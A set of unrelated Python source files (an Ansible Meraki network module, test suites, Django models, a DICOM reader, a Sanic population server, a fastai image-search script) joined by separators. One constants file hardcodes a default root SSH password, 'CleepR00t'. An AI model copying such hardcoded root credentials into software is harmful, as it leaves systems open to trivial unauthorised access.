self.fip_ns.scan_fip_ports(self)
super(DvrLocalRouter, self).process()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, 2019 Kevin Breit (@kbreit) <kevin.breit@kevinbreit.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: meraki_network
short_description: Manage networks in the Meraki cloud
version_added: "2.6"
description:
- Allows for creation, management, and visibility into networks within Meraki.
options:
auth_key:
description:
- Authentication key provided by the dashboard. Required if environmental variable MERAKI_KEY is not set.
state:
description:
- Create or modify an organization.
choices: [ absent, present, query ]
default: present
net_name:
description:
- Name of a network.
aliases: [ name, network ]
net_id:
description:
- ID number of a network.
org_name:
description:
- Name of organization associated to a network.
org_id:
description:
- ID of organization associated to a network.
type:
description:
- Type of network device network manages.
- Required when creating a network.
- As of Ansible 2.8, C(combined) type is no longer accepted.
- As of Ansible 2.8, changes to this parameter are no longer idempotent.
choices: [ appliance, switch, wireless ]
aliases: [ net_type ]
type: list
tags:
type: list
description:
- List of tags to assign to network.
- C(tags) name conflicts with the tags parameter in Ansible. Indentation problems may cause unexpected behaviors.
- Ansible 2.8 converts this to a list from a comma separated list.
timezone:
description:
- Timezone associated to network.
- See U(https://en.wikipedia.org/wiki/List_of_tz_database_time_zones) for a list of valid timezones.
disable_my_meraki:
description: >
- Disables the local device status pages (U[my.meraki.com](my.meraki.com), U[ap.meraki.com](ap.meraki.com), U[switch.meraki.com](switch.meraki.com),
U[wired.meraki.com](wired.meraki.com))
type: bool
version_added: '2.7'
author:
- Kevin Breit (@kbreit)
extends_documentation_fragment: meraki
'''
EXAMPLES = r'''
- name: List all networks associated to the YourOrg organization
meraki_network:
auth_key: abc12345
state: query
org_name: YourOrg
delegate_to: localhost
- name: Query network named MyNet in the YourOrg organization
meraki_network:
auth_key: abc12345
state: query
org_name: YourOrg
net_name: MyNet
delegate_to: localhost
- name: Create network named MyNet in the YourOrg organization
meraki_network:
auth_key: abc12345
state: present
org_name: YourOrg
net_name: MyNet
type: switch
timezone: America/Chicago
tags: production, chicago
delegate_to: localhost
- name: Create combined network named MyNet in the YourOrg organization
meraki_network:
auth_key: abc12345
state: present
org_name: YourOrg
net_name: MyNet
type:
- switch
- appliance
timezone: America/Chicago
tags: production, chicago
delegate_to: localhost
'''
RETURN = r'''
data:
description: Information about the created or manipulated object.
returned: info
type: complex
contains:
id:
description: Identification string of network.
returned: success
type: str
sample: N_12345
name:
description: Written name of network.
returned: success
type: str
sample: YourNet
organizationId:
description: Organization ID which owns the network.
returned: success
type: str
sample: 0987654321
tags:
description: Space delimited tags assigned to network.
returned: success
type: str
sample: " production wireless "
timeZone:
description: Timezone where network resides.
returned: success
type: str
sample: America/Chicago
type:
description: Functional type of network.
returned: success
type: str
sample: switch
disableMyMerakiCom:
description: States whether U(my.meraki.com) and other device portals should be disabled.
returned: success
type: bool
sample: true
'''
import os
from ansible.module_utils.basic import AnsibleModule, json, env_fallback
from ansible.module_utils.urls import fetch_url
from ansible.module_utils._text import to_native
from ansible.module_utils.network.meraki.meraki import MerakiModule, meraki_argument_spec
def is_net_valid(data, net_name=None, net_id=None):
if net_name is None and net_id is None:
return False
for n in data:
if net_name:
if n['name'] == net_name:
return True
elif net_id:
if n['id'] == net_id:
return True
return False
def construct_tags(tags):
formatted_tags = ' '.join(tags)
return ' {0} '.format(formatted_tags) # Meraki needs space padding
def list_to_string(data):
new_string = str()
for i, item in enumerate(data):
if i == len(new_string) - 1:
new_string += i
else:
new_string = "{0}{1} ".format(new_string, item)
return new_string.strip()
def main():
# define the available arguments/parameters that a user can pass to
# the module
argument_spec = meraki_argument_spec()
argument_spec.update(
net_id=dict(type='str'),
type=dict(type='list', choices=['wireless', 'switch', 'appliance'], aliases=['net_type']),
tags=dict(type='list'),
timezone=dict(type='str'),
net_name=dict(type='str', aliases=['name', 'network']),
state=dict(type='str', choices=['present', 'query', 'absent'], default='present'),
disable_my_meraki=dict(type='bool'),
)
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=False,
)
meraki = MerakiModule(module, function='network')
module.params['follow_redirects'] = 'all'
payload = None
create_urls = {'network': '/organizations/{org_id}/networks'}
update_urls = {'network': '/networks/{net_id}'}
delete_urls = {'network': '/networks/{net_id}'}
meraki.url_catalog['create'] = create_urls
meraki.url_catalog['update'] = update_urls
meraki.url_catalog['delete'] = delete_urls
if not meraki.params['org_name'] and not meraki.params['org_id']:
meraki.fail_json(msg='org_name or org_id parameters are required')
if meraki.params['state'] != 'query':
if not meraki.params['net_name'] and not meraki.params['net_id']:
meraki.fail_json(msg='net_name or net_id is required for present or absent states')
if meraki.params['net_name'] and meraki.params['net_id']:
meraki.fail_json(msg='net_name and net_id are mutually exclusive')
# if the user is working with this module in only check mode we do not
# want to make any changes to the environment, just return the current
# state with no modifications
if module.check_mode:
return meraki.result
# Construct payload
if meraki.params['state'] == 'present':
payload = dict()
if meraki.params['net_name']:
payload['name'] = meraki.params['net_name']
if meraki.params['type']:
payload['type'] = list_to_string(meraki.params['type'])
if meraki.params['tags']:
payload['tags'] = construct_tags(meraki.params['tags'])
if meraki.params['timezone']:
payload['timeZone'] = meraki.params['timezone']
if meraki.params['disable_my_meraki'] is not None:
payload['disableMyMerakiCom'] = meraki.params['disable_my_meraki']
# manipulate or modify the state as needed (this is going to be the
# part where your module will do what it needs to do)
org_id = meraki.params['org_id']
if not org_id:
org_id = meraki.get_org_id(meraki.params['org_name'])
nets = meraki.get_nets(org_id=org_id)
# check if network is created
net_id = meraki.params['net_id']
net_exists = False
if net_id is not None:
if is_net_valid(nets, net_id=net_id) is False:
meraki.fail_json(msg="Network specified by net_id does not exist.")
net_exists = True
elif meraki.params['net_name']:
if is_net_valid(nets, net_name=meraki.params['net_name']) is True:
net_id = meraki.get_net_id(net_name=meraki.params['net_name'], data=nets)
net_exists = True
if meraki.params['state'] == 'query':
if not meraki.params['net_name'] and not meraki.params['net_id']:
meraki.result['data'] = nets
elif meraki.params['net_name'] or meraki.params['net_id'] is not None:
meraki.result['data'] = meraki.get_net(meraki.params['org_name'],
meraki.params['net_name'],
data=nets
)
elif meraki.params['state'] == 'present':
if net_exists is False: # Network needs to be created
if 'type' not in meraki.params or meraki.params['type'] is None:
meraki.fail_json(msg="type parameter is required when creating a network.")
path = meraki.construct_path('create',
org_id=org_id
)
r = meraki.request(path,
method='POST',
payload=json.dumps(payload)
)
if meraki.status == 201:
meraki.result['data'] = r
meraki.result['changed'] = True
else:
net = meraki.get_net(meraki.params['org_name'], meraki.params['net_name'], data=nets, net_id=net_id)
# meraki.fail_json(msg="compare", net=net, payload=payload)
if meraki.is_update_required(net, payload):
path = meraki.construct_path('update', net_id=net_id)
# else:
# path = meraki.construct_path('update',
# net_id=meraki.get_net_id(net_name=meraki.params['net_name'], data=nets)
# )
r = meraki.request(path,
method='PUT',
payload=json.dumps(payload))
if meraki.status == 200:
meraki.result['data'] = r
meraki.result['changed'] = True
# else:
# net = meraki.get_net(meraki.params['org_name'], meraki.params['net_name'], data=nets)
# # meraki.fail_json(msg="HERE", net=net, payload=payload)
# if meraki.is_update_required(net, payload):
# path = meraki.construct_path('update',
# net_id=meraki.get_net_id(net_name=meraki.params['net_name'], data=nets)
# )
# r = meraki.request(path,
# method='PUT',
# payload=json.dumps(payload))
# if meraki.status == 200:
# meraki.result['data'] = r
# meraki.result['changed'] = True
# meraki.exit_json(**meraki.result)
elif meraki.params['state'] == 'absent':
if is_net_valid(nets, net_id=net_id) is True:
path = meraki.construct_path('delete', net_id=net_id)
r = meraki.request(path, method='DELETE')
if meraki.status == 204:
meraki.result['changed'] = True
# in the event of a successful module execution, you will want to
# simple AnsibleModule.exit_json(), passing the key/value results
meraki.exit_json(**meraki.result)
if __name__ == '__main__':
main()
|
# ---------------------------------------------
# Calibration of predicted probabilities.
# ---------------------------------------------
import numpy as np
import pandas as pd
import sklearn
from . import utils
class SoftMaxCalibration:
def __init__(self, num_calibration, num_bins):
self._num_calibration = num_calibration
self._num_bins = num_bins
def train_calibration(self, zs, ys):
self._softmax = utils.get_softmax(zs, ys)
def calibrate(self, zs):
return self._softmax(zs)
class SigmoidCalibration:
def __init__(self, num_calibration, num_bins):
self._num_calibration = num_calibration
self._num_bins = num_bins
def train_calibration(self, zs, ys):
self._sigmoid = utils.get_sigmoid(zs, ys)
def calibrate(self, zs):
return self._sigmoid(zs)
class ProbabilityCalibration():
def _fit_multiclass(self, X, y, verbose=False):
"""Fit the calibrated model in multiclass setting
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,)
Target values.
Returns
-------
self : object
Returns an instance of self.
"""
def _fit_multiclass(self, X, y, verbose=False):
"""Fit the calibrated model in multiclabel setting
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,)
Target values.
Returns
-------
self : object
Returns an instance of self.
"""
def predict_proba(self, X):
"""Posterior probabilities of classification
This function returns posterior probabilities of classification
according to each class on an array of test vectors X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The samples.
Returns
-------
C : array, shape (n_samples, n_classes)
The predicted probas.
"""
def output():
print("test package output!")
|
from harstorage.tests import *
class TestChartController(TestController):
"""
Test suite for chart export
"""
def test_01_export_svg(self):
"""Export SVG"""
# Expected valid image
with open("harstorage/tests/functional/testdata/validfile.svg") as file:
response = self.app.post(
url(controller="chart", action="export"),
params={"svg": file.read(), "type": "image/svg+xml",
"filename": "timeline", "width": 960},
status=200)
# Response header
assert response.content_type == "image/svg+xml"
def test_02_export_png(self):
"""Export PNG"""
# Expected valid image
with open("harstorage/tests/functional/testdata/validfile.svg") as file:
response = self.app.post(
url(controller="chart", action="export"),
params={"svg": file.read(), "type": "image/png",
"filename": "timeline", "width": 960},
status=200)
# Response header
assert response.content_type == "image/png"
|
from django.db import models
from cached_fields.fields import CachedIntegerField
from cached_fields.mixins import CachedFieldsMixin
from prefetchapp.handlers import OrderSummaryCacheHandler
class OrderSummary(models.Model):
total = CachedIntegerField(OrderSummaryCacheHandler, null=True)
class Service(models.Model):
total = models.IntegerField()
order = models.ForeignKey(OrderSummary, related_name="services", on_delete=models.CASCADE)
|
import numpy as np
import pickle
with open('sum_rew_final_policy.pkl','rb') as f:
li = pickle.load(f)
ch = np.array(li)
catastrophes = np.sum(ch<-1000)
opt = np.sum((ch>(max(li)-20))&(ch <= max(li)))
print('first 300 rollouts')
print(li[1:300])
print('min rew', min(li))
print('max rew', max(li))
print('mean rew',np.mean(ch))
print('number of opt episodes', opt)
print('number of catastrophes', catastrophes)
print('percent catastrophes', catastrophes/len(li))
|
import numpy as np
import shutil
import os
from os.path import join
from tempfile import mkdtemp
from pysph import has_h5py
try:
# This is for Python-2.6.x
from unittest2 import TestCase, main, skipUnless
except ImportError:
from unittest import TestCase, main, skipUnless
from pysph.base.utils import get_particle_array, get_particle_array_wcsph
from pysph.solver.utils import dump, load, dump_v1, get_files
class TestGetFiles(TestCase):
def setUp(self):
self.root = mkdtemp()
self.fname = 'dam_break_2d'
self.dirname = join(self.root, self.fname + '_output')
os.mkdir(self.dirname)
self.files = [
join(
self.dirname,
self.fname+'_'+str(i)+'.npz'
)
for i in range(11)
]
for name in self.files:
with open(name, 'w') as fp:
fp.write('')
def test_get_files(self):
self.assertEqual(get_files(self.dirname), self.files)
self.assertEqual(get_files(self.dirname, fname=self.fname), self.files)
self.assertEqual(
get_files(
self.dirname,
fname=self.fname,
endswith=('npz', 'hdf5')
),
self.files
)
def tearDown(self):
shutil.rmtree(self.root)
class TestOutputNumpy(TestCase):
def setUp(self):
self.root = mkdtemp()
def tearDown(self):
shutil.rmtree(self.root)
def _get_filename(self, fname):
return join(self.root, fname) + '.npz'
def test_dump_and_load_works_by_default(self):
x = np.linspace(0, 1.0, 10)
y = x*2.0
dt = 1.0
pa = get_particle_array(name='fluid', x=x, y=y)
fname = self._get_filename('simple')
dump(fname, [pa], solver_data={'dt': dt})
data = load(fname)
solver_data = data['solver_data']
arrays = data['arrays']
pa1 = arrays['fluid']
self.assertListEqual(list(solver_data.keys()), ['dt'])
self.assertListEqual(list(sorted(pa.properties.keys())),
list(sorted(pa1.properties.keys())))
self.assertTrue(np.allclose(pa.x, pa1.x, atol=1e-14))
self.assertTrue(np.allclose(pa.y, pa1.y, atol=1e-14))
def test_dump_and_load_works_with_compress(self):
x = np.linspace(0, 1.0, 10)
y = x*2.0
dt = 1.0
pa = get_particle_array(name='fluid', x=x, y=y)
fname = self._get_filename('simple')
dump(fname, [pa], solver_data={'dt': dt})
fnamez = self._get_filename('simplez')
dump(fnamez, [pa], solver_data={'dt': dt}, compress=True)
# Check that the file size is indeed smaller
self.assertTrue(os.stat(fnamez).st_size < os.stat(fname).st_size)
data = load(fnamez)
solver_data = data['solver_data']
arrays = data['arrays']
pa1 = arrays['fluid']
self.assertListEqual(list(solver_data.keys()), ['dt'])
self.assertListEqual(list(sorted(pa.properties.keys())),
list(sorted(pa1.properties.keys())))
self.assertTrue(np.allclose(pa.x, pa1.x, atol=1e-14))
self.assertTrue(np.allclose(pa.y, pa1.y, atol=1e-14))
def test_dump_and_load_with_partial_data_dump(self):
x = np.linspace(0, 1.0, 10)
y = x*2.0
pa = get_particle_array_wcsph(name='fluid', x=x, y=y)
pa.set_output_arrays(['x', 'y'])
fname = self._get_filename('simple')
dump(fname, [pa], solver_data={})
data = load(fname)
arrays = data['arrays']
pa1 = arrays['fluid']
self.assertListEqual(list(sorted(pa.properties.keys())),
list(sorted(pa1.properties.keys())))
self.assertTrue(np.allclose(pa.x, pa1.x, atol=1e-14))
self.assertTrue(np.allclose(pa.y, pa1.y, atol=1e-14))
def test_dump_and_load_with_constants(self):
x = np.linspace(0, 1.0, 10)
y = x*2.0
pa = get_particle_array_wcsph(name='fluid', x=x, y=y,
constants={'c1': 1.0, 'c2': [2.0, 3.0]})
pa.set_output_arrays(['x', 'y'])
fname = self._get_filename('simple')
dump(fname, [pa], solver_data={})
data = load(fname)
arrays = data['arrays']
pa1 = arrays['fluid']
self.assertListEqual(list(sorted(pa.properties.keys())),
list(sorted(pa1.properties.keys())))
self.assertListEqual(list(sorted(pa.constants.keys())),
list(sorted(pa1.constants.keys())))
self.assertTrue(np.allclose(pa.x, pa1.x, atol=1e-14))
self.assertTrue(np.allclose(pa.y, pa1.y, atol=1e-14))
self.assertTrue(np.allclose(pa.c1, pa1.c1, atol=1e-14))
self.assertTrue(np.allclose(pa.c2, pa1.c2, atol=1e-14))
def test_that_output_array_information_is_saved(self):
# Given
x = np.linspace(0, 1.0, 10)
y = x*2.0
pa = get_particle_array(name='fluid', x=x, y=y, u=3*x)
# When
output_arrays = ['x', 'y', 'u']
pa.set_output_arrays(output_arrays)
fname = self._get_filename('simple')
dump(fname, [pa], solver_data={})
data = load(fname)
pa1 = data['arrays']['fluid']
# Then.
self.assertEqual(set(pa.output_property_arrays), set(output_arrays))
self.assertEqual(set(pa1.output_property_arrays), set(output_arrays))
class TestOutputHdf5(TestOutputNumpy):
@skipUnless(has_h5py(), "h5py module is not present")
def setUp(self):
super(TestOutputHdf5, self).setUp()
def _get_filename(self, fname):
return join(self.root, fname) + '.hdf5'
class TestOutputNumpyV1(TestCase):
def setUp(self):
self.root = mkdtemp()
def tearDown(self):
shutil.rmtree(self.root)
def _get_filename(self, fname):
return join(self.root, fname) + '.npz'
def test_load_works_with_dump_version1(self):
x = np.linspace(0, 1.0, 10)
y = x*2.0
pa = get_particle_array(name='fluid', x=x, y=y)
fname = self._get_filename('simple')
dump_v1(fname, [pa], solver_data={})
data = load(fname)
arrays = data['arrays']
pa1 = arrays['fluid']
self.assertListEqual(list(sorted(pa.properties.keys())),
list(sorted(pa1.properties.keys())))
self.assertTrue(np.allclose(pa.x, pa1.x, atol=1e-14))
self.assertTrue(np.allclose(pa.y, pa1.y, atol=1e-14))
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .version import __version__
SEPARATOR = u'$_$'
TEST_REQUEST = u'ping'
VERSION = __version__
DEFAULT_SSH_PORT = u'22'
DEFAULT_SSH_USERNAME = u'root'
DEFAULT_SSH_PASSWORD = u'CleepR00t'
|
from django.urls import path
from blog import views
urlpatterns = [
path("", views.index),
path("article/<int:id>/", views.detail),
]
|
import numpy
import structlog
from gost.utils import evaluate, evaluate_themes, evaluate_nulls, FmaskThemes
from gost.data_model import Measurement
_LOG = structlog.get_logger("fmask")
def test_evaluate_themes_identical(
ref_fmask_measurement1: Measurement, test_fmask_measurement1: Measurement
):
"""Test that the result indicates no pixel has changed categorical state."""
truth = {
"null_2_null": 100.0,
"null_2_clear": 0.0,
"null_2_cloud": 0.0,
"null_2_cloud_shadow": 0.0,
"null_2_snow": 0.0,
"null_2_water": 0.0,
"clear_2_null": 0.0,
"clear_2_clear": 100.0,
"clear_2_cloud": 0.0,
"clear_2_cloud_shadow": 0.0,
"clear_2_snow": 0.0,
"clear_2_water": 0.0,
"cloud_2_null": 0.0,
"cloud_2_clear": 0.0,
"cloud_2_cloud": 100.0,
"cloud_2_cloud_shadow": 0.0,
"cloud_2_snow": 0.0,
"cloud_2_water": 0.0,
"cloud_shadow_2_null": 0.0,
"cloud_shadow_2_clear": 0.0,
"cloud_shadow_2_cloud": 0.0,
"cloud_shadow_2_cloud_shadow": 100.0,
"cloud_shadow_2_snow": 0.0,
"cloud_shadow_2_water": 0.0,
"snow_2_null": 0.0,
"snow_2_clear": 0.0,
"snow_2_cloud": 0.0,
"snow_2_cloud_shadow": 0.0,
"snow_2_snow": 100.0,
"snow_2_water": 0.0,
"water_2_null": 0.0,
"water_2_clear": 0.0,
"water_2_cloud": 0.0,
"water_2_cloud_shadow": 0.0,
"water_2_snow": 0.0,
"water_2_water": 100.0,
}
result = evaluate_themes(ref_fmask_measurement1, test_fmask_measurement1, FmaskThemes)
assert result == truth
def test_evaluate_themes_change(
ref_fmask_measurement2: Measurement, test_fmask_measurement3: Measurement
):
"""Test that the result indicates pixels have changed categorical state."""
truth = {
"null_2_null": 28.57142857142857,
"null_2_clear": 14.285714285714285,
"null_2_cloud": 14.285714285714285,
"null_2_cloud_shadow": 14.285714285714285,
"null_2_snow": 14.285714285714285,
"null_2_water": 14.285714285714285,
"clear_2_null": 14.285714285714285,
"clear_2_clear": 28.57142857142857,
"clear_2_cloud": 14.285714285714285,
"clear_2_cloud_shadow": 14.285714285714285,
"clear_2_snow": 14.285714285714285,
"clear_2_water": 14.285714285714285,
"cloud_2_null": 14.285714285714285,
"cloud_2_clear": 14.285714285714285,
"cloud_2_cloud": 28.57142857142857,
"cloud_2_cloud_shadow": 14.285714285714285,
"cloud_2_snow": 14.285714285714285,
"cloud_2_water": 14.285714285714285,
"cloud_shadow_2_null": 14.285714285714285,
"cloud_shadow_2_clear": 14.285714285714285,
"cloud_shadow_2_cloud": 14.285714285714285,
"cloud_shadow_2_cloud_shadow": 28.57142857142857,
"cloud_shadow_2_snow": 14.285714285714285,
"cloud_shadow_2_water": 14.285714285714285,
"snow_2_null": 14.285714285714285,
"snow_2_clear": 14.285714285714285,
"snow_2_cloud": 14.285714285714285,
"snow_2_cloud_shadow": 14.285714285714285,
"snow_2_snow": 28.57142857142857,
"snow_2_water": 14.285714285714285,
"water_2_null": 14.285714285714285,
"water_2_clear": 14.285714285714285,
"water_2_cloud": 14.285714285714285,
"water_2_cloud_shadow": 14.285714285714285,
"water_2_snow": 14.285714285714285,
"water_2_water": 28.57142857142857,
}
result = evaluate_themes(ref_fmask_measurement2, test_fmask_measurement3, FmaskThemes)
assert result == truth
def test_evaluate_nulls(
ref_reflectance_measurement: Measurement, test_reflectance_measurement1: Measurement
):
"""Test that the two measurements have identical null locations"""
v_2_null, null_2_v = evaluate_nulls(
ref_reflectance_measurement, test_reflectance_measurement1
)
assert v_2_null == 0.0
assert null_2_v == 0.0
def test_evaluate_nulls_change(
ref_reflectance_measurement: Measurement, test_reflectance_measurement2: Measurement
):
"""Test that the two measurements have different null locations"""
v_2_null, null_2_v = evaluate_nulls(
ref_reflectance_measurement, test_reflectance_measurement2
)
assert v_2_null == 0.25
assert null_2_v == 0.125
def test_evaluate_reflectance(
ref_reflectance_measurement: Measurement, test_reflectance_measurement2: Measurement
):
"""Test that the two measurements return zero difference for all pixels."""
result = evaluate(ref_reflectance_measurement, test_reflectance_measurement2)
assert numpy.count_nonzero(result) == 0
def test_evaluate_reflectance_change(
ref_reflectance_measurement: Measurement, test_reflectance_measurement3: Measurement
):
"""Test that the two measurements have all different values."""
result = evaluate(ref_reflectance_measurement, test_reflectance_measurement3)
assert numpy.count_nonzero(result) == 8
|
# Copyright 2008-2018 pydicom authors. See LICENSE file for details.
"""Read a dicom media file"""
import os
from struct import Struct, unpack
from types import TracebackType
from typing import (
Iterator, Tuple, Optional, Union, Type, cast, BinaryIO, Callable
)
from pydicom.misc import size_in_bytes
from pydicom.datadict import dictionary_VR
from pydicom.tag import TupleTag, ItemTag
from pydicom.uid import UID
from pydicom.valuerep import extra_length_VRs
extra_length_VRs_b = tuple(vr.encode('ascii') for vr in extra_length_VRs)
ExplicitVRLittleEndian = b'1.2.840.10008.1.2.1'
ImplicitVRLittleEndian = b'1.2.840.10008.1.2'
DeflatedExplicitVRLittleEndian = b'1.2.840.10008.1.2.1.99'
ExplicitVRBigEndian = b'1.2.840.10008.1.2.2'
_ElementType = Tuple[
Tuple[int, int], Optional[bytes], int, Optional[bytes], int
]
class dicomfile:
"""Context-manager based DICOM file object with data element iteration"""
def __init__(self, filename: Union[str, bytes, os.PathLike]) -> None:
self.fobj = fobj = open(filename, "rb")
# Read the DICOM preamble, if present
self.preamble: Optional[bytes] = fobj.read(0x80)
dicom_prefix = fobj.read(4)
if dicom_prefix != b"DICM":
self.preamble = None
fobj.seek(0)
def __enter__(self) -> "dicomfile":
return self
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]
) -> Optional[bool]:
self.fobj.close()
return None
def __iter__(self) -> Iterator[_ElementType]:
# Need the transfer_syntax later
tsyntax: Optional[UID] = None
# Yield the file meta info elements
file_meta = data_element_generator(
self.fobj,
is_implicit_VR=False,
is_little_endian=True,
stop_when=lambda group, elem: group != 2
)
for elem in file_meta:
if elem[0] == (0x0002, 0x0010):
value = cast(bytes, elem[3])
tsyntax = UID(value.strip(b" \0").decode('ascii'))
yield elem
# Continue to yield elements from the main data
if not tsyntax:
raise NotImplementedError("No transfer syntax in file meta info")
ds_gen = data_element_generator(
self.fobj, tsyntax.is_implicit_VR, tsyntax.is_little_endian
)
for elem in ds_gen:
yield elem
def data_element_generator(
fp: BinaryIO,
is_implicit_VR: bool,
is_little_endian: bool,
stop_when: Optional[Callable[[int, int], bool]] = None,
defer_size: Optional[Union[str, int, float]] = None,
) -> Iterator[_ElementType]:
""":return: (tag, VR, length, value, value_tell,
is_implicit_VR, is_little_endian)
"""
endian_chr = "<" if is_little_endian else ">"
if is_implicit_VR:
element_struct = Struct(endian_chr + "HHL")
else: # Explicit VR
# tag, VR, 2-byte length (or 0 if special VRs)
element_struct = Struct(endian_chr + "HH2sH")
extra_length_struct = Struct(endian_chr + "L") # for special VRs
extra_length_unpack = extra_length_struct.unpack # for lookup speed
# Make local variables so have faster lookup
fp_read = fp.read
fp_tell = fp.tell
element_struct_unpack = element_struct.unpack
defer_size = size_in_bytes(defer_size)
while True:
# Read tag, VR, length, get ready to read value
bytes_read = fp_read(8)
if len(bytes_read) < 8:
return # at end of file
if is_implicit_VR:
# must reset VR each time; could have set last iteration (e.g. SQ)
VR = None
group, elem, length = element_struct_unpack(bytes_read)
else: # explicit VR
group, elem, VR, length = element_struct_unpack(bytes_read)
if VR in extra_length_VRs_b:
length = extra_length_unpack(fp_read(4))[0]
# Positioned to read the value, but may not want to -- check stop_when
value_tell = fp_tell()
if stop_when is not None:
if stop_when(group, elem):
rewind_length = 8
if not is_implicit_VR and VR in extra_length_VRs_b:
rewind_length += 4
fp.seek(value_tell - rewind_length)
return
# Reading the value
# First case (most common): reading a value with a defined length
if length != 0xFFFFFFFF:
if defer_size is not None and length > defer_size:
# Flag as deferred by setting value to None, and skip bytes
value = None
fp.seek(fp_tell() + length)
else:
value = fp_read(length)
# import pdb;pdb.set_trace()
yield ((group, elem), VR, length, value, value_tell)
# Second case: undefined length - must seek to delimiter,
# unless is SQ type, in which case is easier to parse it, because
# undefined length SQs and items of undefined lengths can be nested
# and it would be error-prone to read to the correct outer delimiter
else:
# Try to look up type to see if is a SQ
# if private tag, won't be able to look it up in dictionary,
# in which case just ignore it and read the bytes unless it is
# identified as a Sequence
if VR is None:
try:
VR = dictionary_VR((group, elem)).encode('ascii')
except KeyError:
# Look ahead to see if it consists of items and
# is thus a SQ
next_tag = TupleTag(
cast(
Tuple[int, int],
unpack(endian_chr + "HH", fp_read(4)),
)
)
# Rewind the file
fp.seek(fp_tell() - 4)
if next_tag == ItemTag:
VR = b'SQ'
if VR == b'SQ':
yield ((group, elem), VR, length, None, value_tell)
else:
raise NotImplementedError(
"This reader does not handle undefined length except for "
"SQ"
)
|
import json
import numpy as np
from sanic import Sanic
from sanic import response
from geojson import Polygon
from shapely import geometry as geo
app = Sanic("PopulationDataInquireServer")
def fetchPopulationFromFile(lon, lat):
global data
x = int((lat + 90) * 5)
y = int((lon + 180) * 5)
return float(data[x][y])
def calcPopulation(polygon: Polygon):
global step, cellarea
p = geo.Polygon(polygon["coordinates"][0])
lonMin, latMin, lonMax, latMax = p.bounds
resultlist = list()
for lat in np.arange(latMin, latMax, step, dtype=np.float64):
for lon in np.arange(lonMin, lonMax, step, dtype=np.float64):
cellLon1 = lon - lon % step - step
cellLon2 = lon - lon % step + step
cellLat1 = lat - lat % step - step
cellLat2 = lat - lat % step + step
cellPolygon = geo.Polygon(
[
(cellLon1, cellLat1),
(cellLon2, cellLat1),
(cellLon2, cellLat2),
(cellLon1, cellLat2),
]
)
intersection = cellPolygon.intersection(p)
if not intersection.is_empty:
curpop = fetchPopulationFromFile(cellLon1, cellLat1)
if curpop > 0.0:
resultlist.append(
{
"lonlat": [lon, lat],
"population": (intersection.area / cellarea) * curpop,
}
)
return resultlist
@app.listener("before_server_start")
async def open_file(app, loop):
global data
data = np.loadtxt("datagrid.asc", dtype=np.float64, skiprows=0)
@app.post("/api")
async def postapi(request):
p = Polygon.to_instance(json.loads(request.body))
resultlist = calcPopulation(p)
return response.json(body=resultlist)
if __name__ == "__main__":
data = None
step = 360 / 1800
cellarea = geo.Polygon([(0, 0), (0, step), (step, step), (step, 0)]).area
app.run(host="127.0.0.1", port=8080)
|
from pathlib import Path
from fastai.vision.widgets import *
from fastbook import *
def search_images_bing(key, term, max_images: int = 100, **kwargs):
params = {'q':term, 'count':max_images}
headers = {"Ocp-Apim-Subscription-Key":key}
search_url = "https://api.bing.microsoft.com/v7.0/images/search"
response = requests.get(search_url, headers=headers, params=params)
response.raise_for_status()
search_results = response.json()
return L(search_results['value'])
def prediction():
path = Path()
learn_inf = load_learner(path/'export.pkl')
prediction = learn_inf.predict('test.jpg')
return f"{prediction[0]} with probability {max(prediction[-1]):.4}"
poke_types = 'bulbasaur', 'ivysaur', 'venusaur', 'charmander', 'charmeleon', 'charizard', 'squirtle', 'wartortle', 'blastoise', 'caterpie', 'metapod', 'butterfree', 'weedle', 'kakuna', 'beedrill', 'pidgey', 'pidgeotto', 'pidgeot', 'rattata', 'raticate', 'spearow', 'fearow', 'ekans', 'arbok', 'pikachu', 'raichu', 'sandshrew', 'sandslash', 'nidoran-f', 'nidorina', 'nidoqueen', 'nidoran-m', 'nidorino', 'nidoking', 'clefairy', 'clefable', 'vulpix', 'ninetales', 'jigglypuff', 'wigglytuff', 'zubat', 'golbat', 'oddish', 'gloom', 'vileplume', 'paras', 'parasect', 'venonat', 'venomoth', 'diglett', 'dugtrio', 'meowth', 'persian', 'psyduck', 'golduck', 'mankey', 'primeape', 'growlithe', 'arcanine', 'poliwag', 'poliwhirl', 'poliwrath', 'abra', 'kadabra', 'alakazam', 'machop', 'machoke', 'machamp', 'bellsprout', 'weepinbell', 'victreebel', 'tentacool', 'tentacruel', 'geodude', 'graveler', 'golem', 'ponyta', 'rapidash', 'slowpoke', 'slowbro', 'magnemite', 'magneton', 'farfetchd', 'doduo', 'dodrio', 'seel', 'dewgong', 'grimer', 'muk', 'shellder', 'cloyster', 'gastly', 'haunter', 'gengar', 'onix', 'drowzee', 'hypno', 'krabby', 'kingler', 'voltorb', 'electrode', 'exeggcute', 'exeggutor', 'cubone', 'marowak', 'hitmonlee', 'hitmonchan', 'lickitung', 'koffing', 'weezing', 'rhyhorn', 'rhydon', 'chansey', 'tangela', 'kangaskhan', 'horsea', 'seadra', 'goldeen', 'seaking', 'staryu', 'starmie', 'mr-mime', 'scyther', 'jynx', 'electabuzz', 'magmar', 'pinsir', 'tauros', 'magikarp', 'gyarados', 'lapras', 'ditto', 'eevee', 'vaporeon', 'jolteon', 'flareon', 'porygon', 'omanyte', 'omastar', 'kabuto', 'kabutops', 'aerodactyl', 'snorlax', 'articuno', 'zapdos', 'moltres', 'dratini', 'dragonair', 'dragonite', 'mewtwo', 'mew'
setup_book()
key = os.environ.get('AZURE_SEARCH_KEY', 'XXX')
path = Path('./pokemon')
c = 0
if path.exists():
for o in poke_types:
dest = (path/o)
dest.mkdir(exist_ok=True)
